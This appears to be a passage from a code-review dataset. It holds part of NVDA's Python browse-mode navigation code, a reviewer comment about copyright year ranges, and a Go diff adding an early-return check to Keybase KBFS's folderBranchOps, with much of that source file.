len(searchText) == 1: # If only a single character has been entered, skip (search after) the current item. next(items) for item in items: if self.tree.GetItemText(item).lower().startswith(searchText): self.tree.SelectItem(item) return # Not found. wx.Bell() def _iterReachableTreeItemsFromItem(self, item): while item: yield item childItem = self.tree.GetFirstChild(item)[0] if childItem and self.tree.IsExpanded(item): # Has children and is reachable, so recurse. for childItem in self._iterReachableTreeItemsFromItem(childItem): yield childItem item = self.tree.GetNextSibling(item) def onFilterEditTextChange(self, evt): self.filter(self.filterEdit.GetValue()) evt.Skip() def onAction(self, activate): self.Close() # Save off the last selected element type on to the class so its used in initialization next time. self.__class__.lastSelectedElementType=self.lastSelectedElementType item = self.tree.GetSelection() item = self.tree.GetItemPyData(item).item if activate: item.activate() else: def move(): speech.cancelSpeech() item.moveTo() item.report() wx.CallLater(100, move) class BrowseModeDocumentTextInfo(textInfos.TextInfo): def getControlFieldSpeech(self, attrs, ancestorAttrs, fieldType, formatConfig=None, extraDetail=False, reason=None): textList = [] landmark = attrs.get("landmark") if formatConfig["reportLandmarks"] and fieldType == "start_addedToControlFieldStack" and landmark: try: textList.append(attrs["name"]) except KeyError: pass if landmark == "region": # The word landmark is superfluous for regions. textList.append(aria.landmarkRoles[landmark]) else: textList.append(_("%s landmark") % aria.landmarkRoles[landmark]) textList.append(super(BrowseModeDocumentTextInfo, self).getControlFieldSpeech(attrs, ancestorAttrs, fieldType, formatConfig, extraDetail, reason)) return " ".join(textList) def getControlFieldBraille(self, field, ancestors, reportStart, formatConfig): textList = [] landmark = field.get("landmark") if formatConfig["reportLandmarks"] and reportStart and landmark and field.get("_startOfNode"): try: textList.append(field["name"]) except KeyError: pass if landmark == "region": # The word landmark is superfluous for regions. textList.append(aria.landmarkRoles[landmark]) else: # Translators: This is spoken and brailled to indicate a landmark (example output: main landmark). textList.append(_("%s landmark") % aria.landmarkRoles[landmark]) text = super(BrowseModeDocumentTextInfo, self).getControlFieldBraille(field, ancestors, reportStart, formatConfig) if text: textList.append(text) return " ".join(textList) def _get_focusableNVDAObjectAtStart(self): try: item = next(self.obj._iterNodesByType("focusable", "up", self)) except StopIteration: return self.obj.rootNVDAObject if not item: return self.obj.rootNVDAObject return item.obj class BrowseModeDocumentTreeInterceptor(cursorManager.CursorManager,BrowseModeTreeInterceptor,treeInterceptorHandler.DocumentTreeInterceptor): programmaticScrollMayFireEvent = False def __init__(self,obj): super(BrowseModeDocumentTreeInterceptor,self).__init__(obj) self.disableAutoPassThrough = False self._lastProgrammaticScrollTime = None self.documentConstantIdentifier = self.documentConstantIdentifier self._lastFocusObj = None self._hadFirstGainFocus = False self._enteringFromOutside = True # We need to cache this because it will be unavailable once the document dies. if not hasattr(self.rootNVDAObject.appModule, "_browseModeRememberedCaretPositions"): self.rootNVDAObject.appModule._browseModeRememberedCaretPositions = {} self._lastCaretPosition = None #: True if the last caret move was due to a focus change. self._lastCaretMoveWasFocus = False def terminate(self): if self.shouldRememberCaretPositionAcrossLoads and self._lastCaretPosition: try: self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier] = self._lastCaretPosition except AttributeError: # The app module died. pass def event_treeInterceptor_gainFocus(self): """Triggered when this browse mode document gains focus. This event is only fired upon entering this treeInterceptor when it was not the current treeInterceptor before. This is different to L{event_gainFocus}, which is fired when an object inside this treeInterceptor gains focus, even if that object is in the same treeInterceptor. """ doSayAll=False hadFirstGainFocus=self._hadFirstGainFocus if not hadFirstGainFocus: # This treeInterceptor is gaining focus for the first time. # Fake a focus event on the focus object, as the treeInterceptor may have missed the actual focus event. focus = api.getFocusObject() self.event_gainFocus(focus, lambda: focus.event_gainFocus()) if not self.passThrough: # We only set the caret position if in browse mode. # If in focus mode, the document must have forced the focus somewhere, # so we don't want to override it. initialPos = self._getInitialCaretPos() if initialPos: self.selection = self.makeTextInfo(initialPos) reportPassThrough(self) doSayAll=config.conf['virtualBuffers']['autoSayAllOnPageLoad'] self._hadFirstGainFocus = True if not self.passThrough: if doSayAll: speech.speakObjectProperties(self.rootNVDAObject,name=True,states=True,reason=controlTypes.REASON_FOCUS) sayAllHandler.readText(sayAllHandler.CURSOR_CARET) else: # Speak it like we would speak focus on any other document object. # This includes when entering the treeInterceptor for the first time: if not hadFirstGainFocus: speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS) else: # And when coming in from an outside object # #4069 But not when coming up from a non-rendered descendant. ancestors=api.getFocusAncestors() fdl=api.getFocusDifferenceLevel() try: tl=ancestors.index(self.rootNVDAObject) except ValueError: tl=len(ancestors) if fdl<=tl: speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS) info = self.selection if not info.isCollapsed: speech.speakSelectionMessage(_("selected %s"), info.text) else: info.expand(textInfos.UNIT_LINE) speech.speakTextInfo(info, reason=controlTypes.REASON_CARET, unit=textInfos.UNIT_LINE) reportPassThrough(self) braille.handler.handleGainFocus(self) def event_caret(self, obj, nextHandler): if self.passThrough: nextHandler() def _activateNVDAObject(self, obj): """Activate an object in response to a user request. This should generally perform the default action or click on the object. @param obj: The object to activate. @type obj: L{NVDAObjects.NVDAObject} """ obj.doAction() def _activateLongDesc(self,controlField): """ Activates (presents) the long description for a particular field (usually a graphic). @param controlField: the field who's long description should be activated. This field is guaranteed to have states containing HASLONGDESC state. @type controlField: dict """ raise NotImplementedError def _activatePosition(self, info=None): if not info: info=self.makeTextInfo(textInfos.POSITION_CARET) obj = info.NVDAObjectAtStart if not obj: return if obj.role == controlTypes.ROLE_MATH: import mathPres try: return mathPres.interactWithMathMl(obj.mathMl) except (NotImplementedError, LookupError): pass return if self.shouldPassThrough(obj): obj.setFocus() self.passThrough = True reportPassThrough(self) elif obj.role == controlTypes.ROLE_EMBEDDEDOBJECT or obj.role in self.APPLICATION_ROLES: obj.setFocus() speech.speakObject(obj, reason=controlTypes.REASON_FOCUS) else: self._activateNVDAObject(obj) def _set_selection(self, info, reason=controlTypes.REASON_CARET): super(BrowseModeDocumentTreeInterceptor, self)._set_selection(info) if isScriptWaiting() or not info.isCollapsed: return # Save the last caret position for use in terminate(). # This must be done here because the buffer might be cleared just before terminate() is called, # causing the last caret position to be lost. caret = info.copy() caret.collapse() self._lastCaretPosition = caret.bookmark review.handleCaretMove(caret) if reason == controlTypes.REASON_FOCUS: self._lastCaretMoveWasFocus = True focusObj = api.getFocusObject() if focusObj==self.rootNVDAObject: return else: self._lastCaretMoveWasFocus = False focusObj=info.focusableNVDAObjectAtStart obj=info.NVDAObjectAtStart if not obj: log.debugWarning("Invalid NVDAObjectAtStart") return if obj==self.rootNVDAObject: return if focusObj and not eventHandler.isPendingEvents("gainFocus") and focusObj!=self.rootNVDAObject and focusObj != api.getFocusObject() and self._shouldSetFocusToObj(focusObj): focusObj.setFocus() obj.scrollIntoView() if self.programmaticScrollMayFireEvent: self._lastProgrammaticScrollTime = time.time() self.passThrough=self.shouldPassThrough(focusObj,reason=reason) # Queue the reporting of pass through mode so that it will be spoken after the actual content. queueHandler.queueFunction(queueHandler.eventQueue, reportPassThrough, self) def _shouldSetFocusToObj(self, obj): """Determine whether an object should receive focus. Subclasses may extend or override this method. @param obj: The object in question. @type obj: L{NVDAObjects.NVDAObject} """ return obj.role not in self.APPLICATION_ROLES and obj.isFocusable and obj.role!=controlTypes.ROLE_EMBEDDEDOBJECT def script_activateLongDesc(self,gesture): info=self.makeTextInfo(textInfos.POSITION_CARET) info.expand("character") for field in reversed(info.getTextWithFields()): if isinstance(field,textInfos.FieldCommand) and field.command=="controlStart": states=field.field.get('states') if states and controlTypes.STATE_HASLONGDESC in states: self._activateLongDesc(field.field) break else: # Translators: the message presented when the activateLongDescription script cannot locate a long description to activate. ui.message(_("No long description")) # Translators: the description for the activateLongDescription script on browseMode documents. script_activateLongDesc.__doc__=_("Shows the long description at this position if one is found.") def shouldPassThrough(self, obj, reason=None): """Determine whether pass through mode should be enabled or disabled for a given object. @param obj: The object in question. @type obj: L{NVDAObjects.NVDAObject} @param reason: The reason for this query; one of the output reasons, L{REASON_QUICKNAV}, or C{None} for manual pass through mode activation by the user. @return: C{True} if pass through mode should be enabled, C{False} if it should be disabled. """ if reason and ( self.disableAutoPassThrough or (reason == controlTypes.REASON_FOCUS and not config.conf["virtualBuffers"]["autoPassThroughOnFocusChange"]) or (reason == controlTypes.REASON_CARET and not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]) ): # This check relates to auto pass through and auto pass through is disabled, so don't change the pass through state. return self.passThrough if reason == REASON_QUICKNAV: return False states = obj.states role = obj.role if controlTypes.STATE_EDITABLE in states and controlTypes.STATE_UNAVAILABLE not in states: return True # Menus sometimes get focus due to menuStart events even though they don't report as focused/focusable. if not obj.isFocusable and controlTypes.STATE_FOCUSED not in states and role != controlTypes.ROLE_POPUPMENU: return False # many controls that are read-only should not switch to passThrough. # However, certain controls such as combo boxes and readonly edits are read-only but still interactive. # #5118: read-only ARIA grids should also be allowed (focusable table cells, rows and headers). if controlTypes.STATE_READONLY in states and role not in (controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_TABLEROW, controlTypes.ROLE_TABLECELL, controlTypes.ROLE_TABLEROWHEADER, controlTypes.ROLE_TABLECOLUMNHEADER): return False if reason == controlTypes.REASON_FOCUS and role in (controlTypes.ROLE_LISTITEM, controlTypes.ROLE_RADIOBUTTON, controlTypes.ROLE_TAB): return True if role in (controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_LIST, controlTypes.ROLE_SLIDER, controlTypes.ROLE_TABCONTROL, controlTypes.ROLE_MENUBAR, controlTypes.ROLE_POPUPMENU, controlTypes.ROLE_MENUITEM, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM, controlTypes.ROLE_SPINBUTTON, controlTypes.ROLE_TABLEROW, controlTypes.ROLE_TABLECELL, controlTypes.ROLE_TABLEROWHEADER, controlTypes.ROLE_TABLECOLUMNHEADER, controlTypes.ROLE_CHECKMENUITEM, controlTypes.ROLE_RADIOMENUITEM) or controlTypes.STATE_EDITABLE in states: return True if reason == controlTypes.REASON_FOCUS: # If this is a focus change, pass through should be enabled for certain ancestor containers. while obj and obj != self.rootNVDAObject: if obj.role == controlTypes.ROLE_TOOLBAR: return True obj = obj.parent return False def event_caretMovementFailed(self, obj, nextHandler, gesture=None): if not self.passThrough or not gesture or not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]: return nextHandler() if gesture.mainKeyName in ("home", "end"): # Home, end, control+home and control+end should not disable pass through. return nextHandler() script = self.getScript(gesture) if not script: return nextHandler() # We've hit the edge of the focused control. # Therefore, move the virtual caret to the same edge of the field. info = self.makeTextInfo(textInfos.POSITION_CARET) info.expand(info.UNIT_CONTROLFIELD) if gesture.mainKeyName in ("leftArrow", "upArrow", "pageUp"): info.collapse() else: info.collapse(end=True) info.move(textInfos.UNIT_CHARACTER, -1) info.updateCaret() scriptHandler.queueScript(script, gesture) def script_disablePassThrough(self, gesture): if not self.passThrough or self.disableAutoPassThrough: return gesture.send() self.passThrough = False self.disableAutoPassThrough = False reportPassThrough(self) script_disablePassThrough.ignoreTreeInterceptorPassThrough = True def script_collapseOrExpandControl(self, gesture): oldFocus = api.getFocusObject() oldFocusStates = oldFocus.states gesture.send() if controlTypes.STATE_COLLAPSED in oldFocusStates: self.passThrough = True elif not self.disableAutoPassThrough: self.passThrough = False reportPassThrough(self) script_collapseOrExpandControl.ignoreTreeInterceptorPassThrough = True def _tabOverride(self, direction): """Override the tab order if the virtual caret is not within the currently focused node. This is done because many nodes are not focusable and it is thus possible for the virtual caret to be unsynchronised with the focus. In this case, we want tab/shift+tab to move to the next/previous focusable node relative to the virtual caret. If the virtual caret is within the focused node, the tab/shift+tab key should be passed through to allow normal tab order navigation. Note that this method does not pass the key through itself if it is not overridden. This should be done by the calling script if C{False} is returned. @param direction: The direction in which to move. @type direction: str @return: C{True} if the tab order was overridden, C{False} if not. @rtype: bool """ if self._lastCaretMoveWasFocus: # #5227: If the caret was last moved due to a focus change, don't override tab. # This ensures that tabbing behaves as expected after tabbing hits an iframe document. return False focus = api.getFocusObject() try: focusInfo = self.makeTextInfo(focus) except: return False # We only want to override the tab order if the caret is not within the focused node. caretInfo=self.makeTextInfo(textInfos.POSITION_CARET) #Only check that the caret is within the focus for things that ar not documents #As for documents we should always override if focus.role!=controlTypes.ROLE_DOCUMENT or controlTypes.STATE_EDITABLE in focus.states: # Expand to one character, as isOverlapping() doesn't yield the desired results with collapsed ranges. caretInfo.expand(textInfos.UNIT_CHARACTER) if focusInfo.isOverlapping(caretInfo): return False # If we reach here, we do want to override tab/shift+tab if possible. # Find the next/previous focusable node. try: item = next(self._iterNodesByType("focusable", direction, caretInfo)) except StopIteration: return False obj=item.obj newInfo=item.textInfo if obj == api.getFocusObject(): # This node is already focused, so we need to move to and speak this node here. newCaret = newInfo.copy() newCaret.collapse() self._set_selection(newCaret,reason=controlTypes.REASON_FOCUS) if self.passThrough: obj.event_gainFocus() else: speech.speakTextInfo(newInfo,reason=controlTypes.REASON_FOCUS) else: # This node doesn't have the focus, so just set focus to it. The gainFocus event will handle the rest. obj.setFocus() return True def script_tab(self, gesture): if not self._tabOverride("next"): gesture.send() def script_shiftTab(self, gesture): if not self._tabOverride("previous"): gesture.send() def event_focusEntered(self,obj,nextHandler): if obj==self.rootNVDAObject: self._enteringFromOutside = True if self.passThrough: nextHandler() def _shouldIgnoreFocus(self, obj): """Determines whether focus on a given object should be ignored. @param obj: The object in question. @type obj: L{NVDAObjects.NVDAObject} @return: C{True} if focus on L{obj} should be ignored, C{False} otherwise. @rtype: bool """ return False def _postGainFocus(self, obj): """Executed after a gainFocus within the browseMode document. This will not be executed if L{event_gainFocus} determined that it should abort and call nextHandler. @param obj: The object that gained focus. @type obj: L{NVDAObjects.NVDAObject} """ def _replayFocusEnteredEvents(self): # We blocked the focusEntered events because we were in browse mode, # but now that we've switched to focus mode, we need to fire them. for parent in api.getFocusAncestors()[api.getFocusDifferenceLevel():]: try: parent.event_focusEntered() except: log.exception("Error executing focusEntered event: %s" % parent) def event_gainFocus(self, obj, nextHandler): enteringFromOutside=self._enteringFromOutside self._enteringFromOutside=False if not self.isReady: if self.passThrough: nextHandler() return if enteringFromOutside and not self.passThrough and self._lastFocusObj==obj: # We're entering the document from outside (not returning from an inside object/application; #3145) # and this was the last non-root node with focus, so ignore this focus event. # Otherwise, if the user switches away and back to this document, the cursor will jump to this node. # This is not ideal if the user was positioned over a node which cannot receive focus. return if obj==self.rootNVDAObject: if self.passThrough: return nextHandler() return if not self.passThrough and self._shouldIgnoreFocus(obj): return self._lastFocusObj=obj try: focusInfo = self.makeTextInfo(obj) except: # This object is not in the treeInterceptor, even though it resides beneath the document. # Automatic pass through should be enabled in certain circumstances where this occurs. if not self.passThrough and self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS): self.passThrough=True reportPassThrough(self) self._replayFocusEnteredEvents() return nextHandler() #We only want to update the caret and speak the field if we're not in the same one as before caretInfo=self.makeTextInfo(textInfos.POSITION_CARET) # Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping. caretInfo.expand(textInfos.UNIT_CHARACTER) if not self._hadFirstGainFocus or not focusInfo.isOverlapping(caretInfo): # The virtual caret is not within the focus node. oldPassThrough=self.passThrough passThrough=self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS) if not oldPassThrough and (passThrough or sayAllHandler.isRunning()): # If pass-through is disabled, cancel speech, as a focus change should cause page reading to stop. # This must be done before auto-pass-through occurs, as we want to stop page reading even if pass-through will be automatically enabled by this focus change. speech.cancelSpeech() self.passThrough=passThrough if not self.passThrough: # We read the info from the browseMode document instead of the control itself. speech.speakTextInfo(focusInfo,reason=controlTypes.REASON_FOCUS) # However, we still want to update the speech property cache so that property changes will be spoken properly. speech.speakObject(obj,controlTypes.REASON_ONLYCACHE) else: if not oldPassThrough: self._replayFocusEnteredEvents() nextHandler() focusInfo.collapse() self._set_selection(focusInfo,reason=controlTypes.REASON_FOCUS) else: # The virtual caret was already at the focused node. if not self.passThrough: # This focus change was caused by a virtual caret movement, so don't speak the focused node to avoid double speaking. # However, we still want to update the speech property cache so that property changes will be spoken properly. speech.speakObject(obj,controlTypes.REASON_ONLYCACHE) else: return nextHandler() self._postGainFocus(obj) event_gainFocus.ignoreIsReady=True def _handleScrollTo(self, obj): """Handle scrolling the browseMode document to a given object in response to an event. Subclasses should call this from an event which indicates that the document has scrolled. @postcondition: The virtual caret is moved to L{obj} and the buffer content for L{obj} is reported. @param obj: The object to which the document should scroll. @type obj: L{NVDAObjects.NVDAObject} @return: C{True} if the document was scrolled, C{False} if not. @rtype: bool @note: If C{False} is returned, calling events should probably call their nextHandler. """ if self.programmaticScrollMayFireEvent and self._lastProgrammaticScrollTime and time.time() - self._lastProgrammaticScrollTime < 0.4: # This event was probably caused by this browseMode document's call to scrollIntoView(). # Therefore, ignore it. Otherwise, the cursor may bounce back to the scroll point. # However, pretend we handled it, as we don't want it to be passed on to the object either. return True try: scrollInfo = self.makeTextInfo(obj) except: return False #We only want to update the caret and speak the field if we're not in the same one as before caretInfo=self.makeTextInfo(textInfos.POSITION_CARET) # Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping. caretInfo.expand(textInfos.UNIT_CHARACTER) if not scrollInfo.isOverlapping(caretInfo): if scrollInfo.isCollapsed: scrollInfo.expand(textInfos.UNIT_LINE) speech.speakTextInfo(scrollInfo,reason=controlTypes.REASON_CARET) scrollInfo.collapse() self.selection = scrollInfo return True return False APPLICATION_ROLES = (controlTypes.ROLE_APPLICATION, controlTypes.ROLE_DIALOG) def _isNVDAObjectInApplication(self, obj): """Determine whether a given object is within an application. The object is considered to be within an application if it or one of its ancestors has an application role. This should only be called on objects beneath the treeInterceptor's root NVDAObject. @param obj: The object in question. @type obj: L{NVDAObjects.NVDAObject} @return: C{True} if L{obj} is within an application, C{False} otherwise. @rtype: bool """ # We cache the result for each object we walk. # There can be browse mode documents within other documents and the result might be different between these, # so the cache must be maintained on the TreeInterceptor rather than the object itself. try: cache = self._isInAppCache except AttributeError: # Create this lazily, as this method isn't used by all browse mode implementations. cache = self._isInAppCache = weakref.WeakKeyDictionary() objs = [] def doResult(result): # Cache this on descendants we've walked over. for obj in objs: cache[obj] = result return result while obj and obj != self.rootNVDAObject: inApp = cache.get(obj) if inApp is not None: # We found a cached result. return doResult(inApp) objs.append(obj) if obj.role in self.APPLICATION_ROLES: return doResult(True) # Cache container. container = obj.container obj.container = container obj = container return doResult(False) def _get_documentConstantIdentifier(self): """Get the constant identifier for this document. This identifier should uniquely identify all instances (not just one instance) of a document for at least the current session of the hosting application. Generally, the document URL should be used. @return: The constant identifier for this document, C{None} if there is none. """ return None def _get_shouldRememberCaretPositionAcrossLoads(self): """Specifies whether the position of the caret should be remembered when this document is loaded again. This is useful when the browser remembers the scroll position for the document, but does not communicate this information via APIs. The remembered caret position is associated with this document using L{documentConstantIdentifier}. @return: C{True} if the caret position should be remembered, C{False} if not. @rtype: bool """ docConstId = self.documentConstantIdentifier # Return True if the URL indicates that this is probably a web browser document. # We do this check because we don't want to remember caret positions for email messages, etc. return isinstance(docConstId, basestring) and docConstId.split("://", 1)[0] in ("http", "https", "ftp", "ftps", "file") def _getInitialCaretPos(self): """Retrieve the initial position of the caret after the buffer has been loaded. This position, if any, will be passed to L{makeTextInfo}. Subclasses should extend this method. @return: The initial position of the caret, C{None} if there isn't one. @rtype: TextInfo position """ if self.shouldRememberCaretPositionAcrossLoads: try: return self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier] except KeyError: pass return None def getEnclosingContainerRange(self,range): range=range.copy() range.collapse() try: item = next(self._iterNodesByType("container", "up", range)) except (NotImplementedError,StopIteration): return return item.textInfo def script_moveToStartOfContainer(self,gesture): info=self.makeTextInfo(textInfos.POSITION_CARET) info.expand(textInfos.UNIT_CHARACTER) container=self.getEnclosingContainerRange(info) if not container: # Translators: Reported when the user attempts to move to the start or end of a container (list, table, etc.) # But there is no container. ui.message(_("Not in a container")) return container.collapse() self._set_selection(container, reason=REASON_QUICKNAV) if not willSayAllResume(gesture): container.expand(textInfos.UNIT_LINE) speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS) script_moveToStartOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET # Translators: Description for the Move to start of container command in browse mode. script_moveToStartOfContainer.__doc__=_("Moves to the start of the container element, such as a list or table") def script_movePastEndOfContainer(self,gesture): info=self.makeTextInfo(textInfos.POSITION_CARET) info.expand(textInfos.UNIT_CHARACTER) container=self.getEnclosingContainerRange(info) if not container: ui.message(_("Not in a container")) return container.collapse(end=True) docEnd=container.obj.makeTextInfo(textInfos.POSITION_LAST) if container.compareEndPoints(docEnd,"endToEnd")>=0: container=docEnd # Translators: a message reported when: # Review cursor is at the bottom line of the current navigator object. # Landing at the end of a browse mode document when trying to jump to the end of the current container. ui.message(_("bottom")) self._set_selection(container, reason=REASON_QUICKNAV) if not willSayAllResume(gesture): container.expand(textInfos.UNIT_LINE) speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS) script_movePastEndOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET # Translators: Description for the Move past end of container command in browse mode. script_movePastEndOfContainer.__doc__=_("Moves past the end of the container element, such as a list or table") NOT_LINK_BLOCK_MIN_LEN = 30 def _isSuitableNotLinkBlock(self,range): return len(range.text)>=self.NOT_LINK_BLOCK_MIN_LEN def _iterNotLinkBlock(self, direction="next", pos=None): links = self._iterNodesByType("link", direction=direction, pos=pos) # We want to compare each link against the next link. item1 = next(links) while True: item2 = next(links) # If the distance between the links is small, this is probably just a piece of non-link text within a block of links; e.g. an inactive link of a nav bar. if direction=="previous": range=item1.textInfo.copy() range.collapse() range.setEndPoint(item2.textInfo,"startToEnd") else: range=item2.textInfo.copy() range.collapse() range.setEndPoint(item1.textInfo,"startToEnd") if self._isSuitableNotLinkBlock(range): yield TextInfoQuickNavItem("notLinkBlock",self,range) item1=item2 __gestures={ "kb:NVDA+d": "activateLongDesc", "kb:escape": "disablePassThrough", "kb:alt+upArrow": "collapseOrExpandControl", "kb:alt+downArrow": "collapseOrExpandControl", "kb:tab": "tab", "kb:shift+tab": "shiftTab", "kb:shift+,": "moveToStartOfContainer", "kb:,": "movePastEndOfContainer", }
1
17,676
When updating the copyright, we tend to cover previous years, not just the current. So, if we started the file in 2015, we'd update to say 2015-2016. I'm not sure if there's a legal requirement surrounding this, but it's the convention we and many others have adopted for code.
nvaccess-nvda
py
@@ -1180,6 +1180,16 @@ func (fbo *folderBranchOps) SetInitialHeadFromServer( return fmt.Errorf("MD with revision=%d not initialized", md.Revision()) } + // Return early if the head is already set. This avoids taking + // mdWriterLock for no reason. + lState := makeFBOLockState() + head := fbo.getHead(lState) + if head != (ImmutableRootMetadata{}) && head.mdID == md.mdID { + fbo.log.CDebugf(ctx, "Head MD already set to revision %d (%s), no "+ + "need to set initial head again", md.Revision(), md.MergedStatus()) + return nil + } + return runUnlessCanceled(ctx, func() error { fb := FolderBranch{md.TlfID(), MasterBranch} if fb != fbo.folderBranch {
1
// Copyright 2016 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import ( "errors" "fmt" "os" "reflect" "strings" "sync" "time" "github.com/keybase/backoff" "github.com/keybase/client/go/logger" "github.com/keybase/client/go/protocol/keybase1" "golang.org/x/net/context" ) // mdReqType indicates whether an operation makes MD modifications or not type mdReqType int const ( // A read request that doesn't need an identify to be // performed. mdReadNoIdentify mdReqType = iota // A read request that needs an identify to be performed (if // it hasn't been already). mdReadNeedIdentify // A write request. mdWrite // A rekey request. Doesn't need an identify to be performed, as // a rekey does its own (finer-grained) identifies. mdRekey ) type branchType int const ( standard branchType = iota // an online, read-write branch archive // an online, read-only branch offline // an offline, read-write branch archiveOffline // an offline, read-only branch ) // Constants used in this file. TODO: Make these configurable? const ( // MaxBlockSizeBytesDefault is the default maximum block size for KBFS. // 512K blocks by default, block changes embedded max == 8K. // Block size was chosen somewhat arbitrarily by trying to // minimize the overall size of the history written by a user when // appending 1KB writes to a file, up to a 1GB total file. Here // is the output of a simple script that approximates that // calculation: // // Total history size for 0065536-byte blocks: 1134341128192 bytes // Total history size for 0131072-byte blocks: 618945052672 bytes // Total history size for 0262144-byte blocks: 412786622464 bytes // Total history size for 0524288-byte blocks: 412786622464 bytes // Total history size for 1048576-byte blocks: 618945052672 bytes // Total history size for 2097152-byte blocks: 1134341128192 bytes // Total history size for 4194304-byte blocks: 2216672886784 bytes MaxBlockSizeBytesDefault = 512 << 10 // Maximum number of blocks that can be sent in parallel maxParallelBlockPuts = 100 // Max response size for a single DynamoDB query is 1MB. maxMDsAtATime = 10 // Time between checks for dirty files to flush, in case Sync is // never called. secondsBetweenBackgroundFlushes = 10 // Cap the number of times we retry after a recoverable error maxRetriesOnRecoverableErrors = 10 // When the number of dirty bytes exceeds this level, force a sync. dirtyBytesThreshold = maxParallelBlockPuts * MaxBlockSizeBytesDefault // The timeout for any background task. backgroundTaskTimeout = 1 * time.Minute ) type fboMutexLevel mutexLevel const ( fboMDWriter fboMutexLevel = 1 fboHead = 2 fboBlock = 3 ) func (o fboMutexLevel) String() string { switch o { case fboMDWriter: return "mdWriterLock" case fboHead: return "headLock" case fboBlock: return "blockLock" default: return fmt.Sprintf("Invalid fboMutexLevel %d", int(o)) } } func fboMutexLevelToString(o mutexLevel) string { return (fboMutexLevel(o)).String() } // Rules for working with lockState in FBO: // // - Every "execution flow" (i.e., program flow that happens // sequentially) needs its own lockState object. This usually means // that each "public" FBO method does: // // lState := makeFBOLockState() // // near the top. // // - Plumb lState through to all functions that hold any of the // relevant locks, or are called under those locks. // // This way, violations of the lock hierarchy will be detected at // runtime. func makeFBOLockState() *lockState { return makeLevelState(fboMutexLevelToString) } // blockLock is just like a sync.RWMutex, but with an extra operation // (DoRUnlockedIfPossible). type blockLock struct { leveledRWMutex locked bool } func (bl *blockLock) Lock(lState *lockState) { bl.leveledRWMutex.Lock(lState) bl.locked = true } func (bl *blockLock) Unlock(lState *lockState) { bl.locked = false bl.leveledRWMutex.Unlock(lState) } // DoRUnlockedIfPossible must be called when r- or w-locked. If // r-locked, r-unlocks, runs the given function, and r-locks after // it's done. Otherwise, just runs the given function. func (bl *blockLock) DoRUnlockedIfPossible(lState *lockState, f func(*lockState)) { if !bl.locked { bl.RUnlock(lState) defer bl.RLock(lState) } f(lState) } // folderBranchOps implements the KBFSOps interface for a specific // branch of a specific folder. It is go-routine safe for operations // within the folder. // // We use locks to protect against multiple goroutines accessing the // same folder-branch. The goal with our locking strategy is maximize // concurrent access whenever possible. See design/state_machine.md // for more details. There are three important locks: // // 1) mdWriterLock: Any "remote-sync" operation (one which modifies the // folder's metadata) must take this lock during the entirety of // its operation, to avoid forking the MD. // // 2) headLock: This is a read/write mutex. It must be taken for // reading before accessing any part of the current head MD. It // should be taken for the shortest time possible -- that means in // general that it should be taken, and the MD copied to a // goroutine-local variable, and then it can be released. // Remote-sync operations should take it for writing after pushing // all of the blocks and MD to the KBFS servers (i.e., all network // accesses), and then hold it until after all notifications have // been fired, to ensure that no concurrent "local" operations ever // see inconsistent state locally. // // 3) blockLock: This too is a read/write mutex. It must be taken for // reading before accessing any blocks in the block cache that // belong to this folder/branch. This includes checking their // dirty status. It should be taken for the shortest time possible // -- that means in general it should be taken, and then the blocks // that will be modified should be copied to local variables in the // goroutine, and then it should be released. The blocks should // then be modified locally, and then readied and pushed out // remotely. Only after the blocks have been pushed to the server // should a remote-sync operation take the lock again (this time // for writing) and put/finalize the blocks. Write and Truncate // should take blockLock for their entire lifetime, since they // don't involve writes over the network. Furthermore, if a block // is not in the cache and needs to be fetched, we should release // the mutex before doing the network operation, and lock it again // before writing the block back to the cache. // // We want to allow writes and truncates to a file that's currently // being sync'd, like any good networked file system. The tricky part // is making sure the changes can both: a) be read while the sync is // happening, and b) be applied to the new file path after the sync is // done. // // For now, we just do the dumb, brute force thing for now: if a block // is currently being sync'd, it copies the block and puts it back // into the cache as modified. Then, when the sync finishes, it // throws away the modified blocks and re-applies the change to the // new file path (which might have a completely different set of // blocks, so we can't just reuse the blocks that were modified during // the sync.) type folderBranchOps struct { config Config folderBranch FolderBranch bid BranchID // protected by mdWriterLock bType branchType observers *observerList // these locks, when locked concurrently by the same goroutine, // should only be taken in the following order to avoid deadlock: mdWriterLock leveledMutex // taken by any method making MD modifications // protects access to head and latestMergedRevision. headLock leveledRWMutex head ImmutableRootMetadata // latestMergedRevision tracks the latest heard merged revision on server latestMergedRevision MetadataRevision blocks folderBlockOps // nodeCache itself is goroutine-safe, but this object's use // of it has special requirements: // // - Reads can call PathFromNode() unlocked, since there are // no guarantees with concurrent reads. // // - Operations that takes mdWriterLock always needs the // most up-to-date paths, so those must call // PathFromNode() under mdWriterLock. // // - Block write operations (write/truncate/sync) need to // coordinate. Specifically, sync must make sure that // blocks referenced in a path (including all of the child // blocks) must exist in the cache during calls to // PathFromNode from write/truncate. This means that sync // must modify dirty file blocks only under blockLock, and // write/truncate must call PathFromNode() under // blockLock. // // Furthermore, calls to UpdatePointer() must happen // before the copy-on-write mode induced by Sync() is // finished. nodeCache NodeCache // Whether we've identified this TLF or not. identifyLock sync.Mutex identifyDone bool identifyTime time.Time // The current status summary for this folder status *folderBranchStatusKeeper // How to log log logger.Logger deferLog logger.Logger // Closed on shutdown shutdownChan chan struct{} // Can be used to turn off notifications for a while (e.g., for testing) updatePauseChan chan (<-chan struct{}) // After a shutdown, this channel will be closed when the register // goroutine completes. 